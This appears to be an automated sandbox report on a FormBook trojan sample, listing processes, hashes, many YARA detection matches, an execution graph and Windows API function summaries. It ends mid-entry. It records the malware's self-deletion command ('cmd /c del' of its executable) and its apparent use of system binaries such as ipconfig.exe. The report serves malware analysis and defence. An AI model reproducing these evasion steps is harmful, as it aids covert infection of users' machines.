                                                                                                                            Imagebase:0x7ff62d7d0000
                                                                                                                            File size:5'141'208 bytes
                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4011430051.00000000115F5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:10:49:23
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff605670000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:10:49:25
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\SysWOW64\autoconv.exe"
                                                                                                                            Imagebase:0x940000
                                                                                                                            File size:842'752 bytes
                                                                                                                            MD5 hash:A705C2ACED7DDB71AFB87C4ED384BED6
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:10:49:31
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                                                            Imagebase:0xf60000
                                                                                                                            File size:29'184 bytes
                                                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000674130.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4000456105.0000000003480000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:10:49:34
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:/c del "C:\Users\user\Desktop\JHnNxt6Pnb.exe"
                                                                                                                            Imagebase:0xa40000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:10:49:34
                                                                                                                            Start date:05/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:9.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:2.1%
                                                                                                                              Total number of Nodes:141
                                                                                                                              Total number of Limit Nodes:9
                                                                                                                              execution_graph 23896 cdd01c 23897 cdd034 23896->23897 23898 cdd08e 23897->23898 23903 4f81ea8 23897->23903 23907 4f80ad4 23897->23907 23916 4f82c08 23897->23916 23925 4f81e98 23897->23925 23904 4f81ece 23903->23904 23905 4f80ad4 CallWindowProcW 23904->23905 23906 4f81eef 23905->23906 23906->23898 23908 4f80adf 23907->23908 23909 4f82c79 23908->23909 23911 4f82c69 23908->23911 23945 4f80bfc 23909->23945 23929 4f82e6c 23911->23929 23935 4f82d91 23911->23935 23940 4f82da0 23911->23940 23912 4f82c77 23919 4f82c45 23916->23919 23917 4f82c79 23918 4f80bfc CallWindowProcW 23917->23918 23921 4f82c77 23918->23921 23919->23917 23920 4f82c69 23919->23920 23922 4f82e6c CallWindowProcW 23920->23922 23923 4f82da0 CallWindowProcW 23920->23923 23924 4f82d91 CallWindowProcW 23920->23924 23922->23921 23923->23921 23924->23921 23926 4f81ece 23925->23926 23927 4f80ad4 CallWindowProcW 23926->23927 23928 4f81eef 23927->23928 23928->23898 23930 4f82e2a 23929->23930 23931 4f82e7a 23929->23931 23949 4f82e58 23930->23949 23952 4f82e48 23930->23952 23932 4f82e40 23932->23912 23937 4f82db4 23935->23937 23936 4f82e40 23936->23912 23938 4f82e58 CallWindowProcW 23937->23938 23939 4f82e48 CallWindowProcW 23937->23939 23938->23936 23939->23936 23942 4f82db4 23940->23942 23941 4f82e40 23941->23912 23943 4f82e58 CallWindowProcW 23942->23943 23944 4f82e48 CallWindowProcW 23942->23944 23943->23941 23944->23941 23946 4f80c07 23945->23946 23947 4f8435a CallWindowProcW 23946->23947 23948 4f84309 23946->23948 23947->23948 23948->23912 23950 4f82e69 23949->23950 23955 4f842a0 23949->23955 23950->23932 23953 4f82e69 23952->23953 23954 4f842a0 CallWindowProcW 23952->23954 23953->23932 23954->23953 23956 4f80bfc CallWindowProcW 23955->23956 23957 4f842aa 23956->23957 23957->23950 23790 e346a0 23792 e346b7 23790->23792 23791 e346ee 23792->23791 23795 e33e6c 23792->23795 23799 e347b8 23792->23799 23796 e33e77 23795->23796 23803 e35b74 23796->23803 23798 e37160 23798->23792 23800 e347da 23799->23800 23802 e347e5 23800->23802 23857 e348b0 23800->23857 23802->23792 23804 e35b7f 23803->23804 23807 e35b94 23804->23807 23806 e3732d 23806->23798 23808 e35b9f 23807->23808 23811 e35bc4 23808->23811 23810 e37402 23810->23806 23812 e35bcf 23811->23812 23815 e35bf4 23812->23815 23814 e37505 23814->23810 23816 e35bff 23815->23816 23818 e38a6b 23816->23818 23821 e3b121 23816->23821 23817 e38aa9 23817->23814 23818->23817 23825 e3d214 23818->23825 23830 e3b158 23821->23830 23833 e3b148 23821->23833 23822 e3b136 23822->23818 23826 e3d231 23825->23826 23827 e3d255 23826->23827 23841 e3d3b1 23826->23841 23845 e3d3c0 23826->23845 23827->23817 23831 e3b167 23830->23831 23836 e3b250 23830->23836 23831->23822 23835 e3b250 GetModuleHandleW 23833->23835 23834 e3b167 23834->23822 23835->23834 23837 e3b284 23836->23837 23838 e3b261 23836->23838 23837->23831 23838->23837 23839 e3b488 GetModuleHandleW 23838->23839 23840 e3b4b5 23839->23840 23840->23831 23842 e3d3cd 23841->23842 23844 e3d407 23842->23844 23849 e3cce8 23842->23849 23844->23827 23846 e3d3cd 23845->23846 23847 e3d407 23846->23847 23848 e3cce8 GetModuleHandleW 23846->23848 23847->23827 23848->23847 23850 e3ccf3 23849->23850 23852 e3dd18 23850->23852 23853 e3ce14 23850->23853 23852->23852 23854 e3ce1f 23853->23854 23855 e35bf4 GetModuleHandleW 23854->23855 23856 e3dd87 23855->23856 23856->23852 23858 e348bd 23857->23858 23862 e349c0 23858->23862 23866 e349b0 23858->23866 23863 e349e7 23862->23863 23865 e34ac4 23863->23865 23870 e34610 23863->23870 23868 e349e7 23866->23868 23867 e34ac4 23867->23867 23868->23867 23869 e34610 CreateActCtxA 23868->23869 23869->23867 23871 e35e50 CreateActCtxA 23870->23871 23873 e35f13 23871->23873 23873->23873 23874 e3d720 DuplicateHandle 23875 e3d7b6 23874->23875 23876 4f81cf0 23877 4f81d58 CreateWindowExW 23876->23877 23879 4f81e14 23877->23879 23958 e3d4d8 23959 e3d51e GetCurrentProcess 23958->23959 23961 e3d570 GetCurrentThread 23959->23961 23962 e3d569 23959->23962 23963 e3d5a6 23961->23963 23964 e3d5ad GetCurrentProcess 23961->23964 23962->23961 23963->23964 23967 e3d5e3 23964->23967 23965 e3d60b GetCurrentThreadId 23966 e3d63c 23965->23966 23967->23965 23880 4f89534 23884 4f8adb8 23880->23884 23888 4f8adab 23880->23888 23881 4f89546 23885 4f8adcf 23884->23885 23892 4f875d0 23885->23892 23887 4f8ade9 23887->23881 23889 4f8adcf 23888->23889 23890 4f875d0 GetModuleHandleW 23889->23890 23891 4f8ade9 23890->23891 23891->23881 23893 4f875db 23892->23893 23894 e35bf4 GetModuleHandleW 23893->23894 23895 4f8ae92 23893->23895 23894->23895 23895->23887

                                                                                                                              Executed Functions

                                                                                                                              Function 00E37108 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 266 e37108-e37136 267 e37138 266->267 268 e3713d-e3715b call e35b74 266->268 267->268 270 e37160 268->270 271 e37167-e37183 270->271 272 e37185 271->272 273 e3718c-e3718d 271->273 272->270 274 e371c3-e3720d 272->274 275 e37192-e371a5 272->275 276 e371a7-e371aa call e35b84 272->276 277 e37256-e37269 272->277 278 e3723e-e37251 272->278 279 e3726e-e37272 272->279 273->275 273->279 285 e37217-e3721a 274->285 275->271 281 e371af-e371c1 276->281 277->271 278->271 281->271 286 e37223-e37239 285->286 286->271
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: JD0
                                                                                                                              • API String ID: 0-2413711749
                                                                                                                              • Opcode ID: 0d9be54d21791483296c484539ee083ebfd32dfab878f86381b983686a952a9a
                                                                                                                              • Instruction ID: 820ad31e6be459058dc34cdbcf3671dc750af35576098cc5fc3b5ab6e1677987
                                                                                                                              • Opcode Fuzzy Hash: 0d9be54d21791483296c484539ee083ebfd32dfab878f86381b983686a952a9a
                                                                                                                              • Instruction Fuzzy Hash: ED413BB5E05209EFDB48CFA5C5446AEFFF2EF89300F2494AAC409A7365EB305A01DB50
                                                                                                                              Function 00E33E6C Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 287 e33e6c-e37136 290 e37138 287->290 291 e3713d-e3715b call e35b74 287->291 290->291 293 e37160 291->293 294 e37167-e37183 293->294 295 e37185 294->295 296 e3718c-e3718d 294->296 295->293 297 e371c3-e3721a 295->297 298 e37192-e371a5 295->298 299 e371a7-e371aa call e35b84 295->299 300 e37256-e37269 295->300 301 e3723e-e37251 295->301 302 e3726e-e37272 295->302 296->298 296->302 309 e37223-e37239 297->309 298->294 304 e371af-e371c1 299->304 300->294 301->294 304->294 309->294
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: JD0
                                                                                                                              • API String ID: 0-2413711749
                                                                                                                              • Opcode ID: 949abe774337f91afc3860cf881b001fb8193a64c4521d60b2cc5389446f1ce7
                                                                                                                              • Instruction ID: 215552bb1f07e3f27d7b0d8ce37e646323da061204fdb0f96aaa525b10652983
                                                                                                                              • Opcode Fuzzy Hash: 949abe774337f91afc3860cf881b001fb8193a64c4521d60b2cc5389446f1ce7
                                                                                                                              • Instruction Fuzzy Hash: BC413BB5E05209EFDB08DFA5C5446AEFBF2FB89300F24946A9409A7364EB309A01DB50
                                                                                                                              Function 00E3D4C8 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00E3D556
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00E3D593
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00E3D5D0
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E3D629
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 431e6c774d02b78ddcc8d0e12c33065331121332aad3ef705857a52db79aaec9
                                                                                                                              • Instruction ID: 18cd1af3be7cb0e3c68e272197bef256fced28e5683fc87178fa39aeff7fc618
                                                                                                                              • Opcode Fuzzy Hash: 431e6c774d02b78ddcc8d0e12c33065331121332aad3ef705857a52db79aaec9
                                                                                                                              • Instruction Fuzzy Hash: 915156B09007498FDB18DFA9E948B9EBFF1BB88314F248059E419B7390D7749984CF65
                                                                                                                              Function 00E3D4D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00E3D556
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00E3D593
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00E3D5D0
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E3D629
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: f5cf0ccddfd6de990a5bf88b5362d9fd554e83890946056a139ef2f55fce0e4e
                                                                                                                              • Instruction ID: 574ed19b2dd95c173d9a2f99904c0afbffddf8a9c6bd60cf8efb17ef51626061
                                                                                                                              • Opcode Fuzzy Hash: f5cf0ccddfd6de990a5bf88b5362d9fd554e83890946056a139ef2f55fce0e4e
                                                                                                                              • Instruction Fuzzy Hash: 785157B09007098FDB18DFAAE948B9EBBF1BB88314F248059E419B7390DB759944CF65
                                                                                                                              Function 00E3B250 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 62 e3b250-e3b25f 63 e3b261-e3b26e call e3ac24 62->63 64 e3b28b-e3b28f 62->64 69 e3b270 63->69 70 e3b284 63->70 66 e3b2a3-e3b2e4 64->66 67 e3b291-e3b29b 64->67 73 e3b2f1-e3b2ff 66->73 74 e3b2e6-e3b2ee 66->74 67->66 117 e3b276 call e3b4e8 69->117 118 e3b276 call e3b4d8 69->118 70->64 75 e3b323-e3b325 73->75 76 e3b301-e3b306 73->76 74->73 81 e3b328-e3b32f 75->81 78 e3b311 76->78 79 e3b308-e3b30f call e3ac30 76->79 77 e3b27c-e3b27e 77->70 80 e3b3c0-e3b480 77->80 83 e3b313-e3b321 78->83 79->83 112 e3b482-e3b485 80->112 113 e3b488-e3b4b3 GetModuleHandleW 80->113 84 e3b331-e3b339 81->84 85 e3b33c-e3b343 81->85 83->81 84->85 87 e3b350-e3b359 call e3ac40 85->87 88 e3b345-e3b34d 85->88 93 e3b366-e3b36b 87->93 94 e3b35b-e3b363 87->94 88->87 95 e3b389-e3b396 93->95 96 e3b36d-e3b374 93->96 94->93 103 e3b3b9-e3b3bf 95->103 104 e3b398-e3b3b6 95->104 96->95 98 e3b376-e3b386 call e3ac50 call e3ac60 96->98 98->95 104->103 112->113 114 e3b4b5-e3b4bb 113->114 115 e3b4bc-e3b4d0 113->115 114->115 117->77 118->77
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3B4A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 78f4b4c8bc44cdcec5bd59080936a1c60c53f29cc6ec1de98e15623d28801609
                                                                                                                              • Instruction ID: 347149d83e39f2c2a735224c21801945e5b28e3f0291b099ea9d4952a9d9c7f5
                                                                                                                              • Opcode Fuzzy Hash: 78f4b4c8bc44cdcec5bd59080936a1c60c53f29cc6ec1de98e15623d28801609
                                                                                                                              • Instruction Fuzzy Hash: AD716770A00B058FD724DF6AD04875ABBF1FF88304F008A2DE59AEBA50DB75E945CB91
                                                                                                                              Function 04F81CE4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 119 4f81ce4-4f81d56 120 4f81d58-4f81d5e 119->120 121 4f81d61-4f81d68 119->121 120->121 122 4f81d6a-4f81d70 121->122 123 4f81d73-4f81dab 121->123 122->123 124 4f81db3-4f81e12 CreateWindowExW 123->124 125 4f81e1b-4f81e53 124->125 126 4f81e14-4f81e1a 124->126 130 4f81e60 125->130 131 4f81e55-4f81e58 125->131 126->125 132 4f81e61 130->132 131->130 132->132
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 677198392710110797d7e295dbc77f4b7f69656699aacd9abe70261919944da9
                                                                                                                              • Instruction ID: 195c59ed33ca67789cf89df8d24db7877485f236c10da2a35dd8793b76023d40
                                                                                                                              • Opcode Fuzzy Hash: 677198392710110797d7e295dbc77f4b7f69656699aacd9abe70261919944da9
                                                                                                                              • Instruction Fuzzy Hash: 6751B2B1D00349DFDB14DF99C984ADEBBB5BF88310F24822EE419AB250D775A946CF90
                                                                                                                              Function 04F81CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 133 4f81cf0-4f81d56 134 4f81d58-4f81d5e 133->134 135 4f81d61-4f81d68 133->135 134->135 136 4f81d6a-4f81d70 135->136 137 4f81d73-4f81e12 CreateWindowExW 135->137 136->137 139 4f81e1b-4f81e53 137->139 140 4f81e14-4f81e1a 137->140 144 4f81e60 139->144 145 4f81e55-4f81e58 139->145 140->139 146 4f81e61 144->146 145->144 146->146
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F81E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 0da5241737abb533ce20cab5cc871bcfffc74eecece7966fe2f4142a9e2367cd
                                                                                                                              • Instruction ID: ae78509641473dbe73bfc4e873dae9aea2282735fffba8b6f04fafc329027542
                                                                                                                              • Opcode Fuzzy Hash: 0da5241737abb533ce20cab5cc871bcfffc74eecece7966fe2f4142a9e2367cd
                                                                                                                              • Instruction Fuzzy Hash: 1B41B2B1D00349DFDB14DF99C984ADEBBB5BF48310F24822EE819AB210D775A846CF90
                                                                                                                              Function 04F80BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 147 4f80bfc-4f842fc 150 4f843ac-4f843cc call 4f80ad4 147->150 151 4f84302-4f84307 147->151 158 4f843cf-4f843dc 150->158 152 4f84309-4f84340 151->152 153 4f8435a-4f84392 CallWindowProcW 151->153 160 4f84349-4f84358 152->160 161 4f84342-4f84348 152->161 156 4f8439b-4f843aa 153->156 157 4f84394-4f8439a 153->157 156->158 157->156 160->158 161->160
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F84381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 9ccad42d638d770a0ede3355781633d43e92f7a6eaaccd4597cbf03f758e8d65
                                                                                                                              • Instruction ID: 6c7b2cecfc5fe31b7f9933445c87e19044d7ea563d1696af8faf707272a7ef77
                                                                                                                              • Opcode Fuzzy Hash: 9ccad42d638d770a0ede3355781633d43e92f7a6eaaccd4597cbf03f758e8d65
                                                                                                                              • Instruction Fuzzy Hash: 69414AB59003098FDB14DF99C448AAABBF5FF88314F25C45DE518AB321D775A841CFA0
                                                                                                                              Function 00E34610 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 164 e34610-e35f11 CreateActCtxA 167 e35f13-e35f19 164->167 168 e35f1a-e35f74 164->168 167->168 175 e35f83-e35f87 168->175 176 e35f76-e35f79 168->176 177 e35f89-e35f95 175->177 178 e35f98 175->178 176->175 177->178 180 e35f99 178->180 180->180
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00E35F01
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 360064ad361da3e894df36a141266051a504b04eb7d2be6e0d2a8370cb6c6432
                                                                                                                              • Instruction ID: 037d5e50ca7a304c9ccd0cf02c5d6afad0294440af270ae4376f3d6860dccf8d
                                                                                                                              • Opcode Fuzzy Hash: 360064ad361da3e894df36a141266051a504b04eb7d2be6e0d2a8370cb6c6432
                                                                                                                              • Instruction Fuzzy Hash: C341BF71D0071DCBDB24DFA9C84879EBBF5BB84704F60816AD408AB251DB756945CF90
                                                                                                                              Function 00E35E44 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 181 e35e44-e35e47 182 e35e54-e35f11 CreateActCtxA 181->182 184 e35f13-e35f19 182->184 185 e35f1a-e35f74 182->185 184->185 192 e35f83-e35f87 185->192 193 e35f76-e35f79 185->193 194 e35f89-e35f95 192->194 195 e35f98 192->195 193->192 194->195 197 e35f99 195->197 197->197
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00E35F01
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 44708e8696e61de52c93c62983035a0f96cd11803dfc5f1d99e561fff94478b6
                                                                                                                              • Instruction ID: c689fe39e794f5ed5d8f411bc30cf3dc000170807ae72f36f380270496718293
                                                                                                                              • Opcode Fuzzy Hash: 44708e8696e61de52c93c62983035a0f96cd11803dfc5f1d99e561fff94478b6
                                                                                                                              • Instruction Fuzzy Hash: 8B41BDB1D00B1DCFDB24DFAAC94878EBBB5BF88704F24816AD408AB251DBB55945CF50
                                                                                                                              Function 00E3D718 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
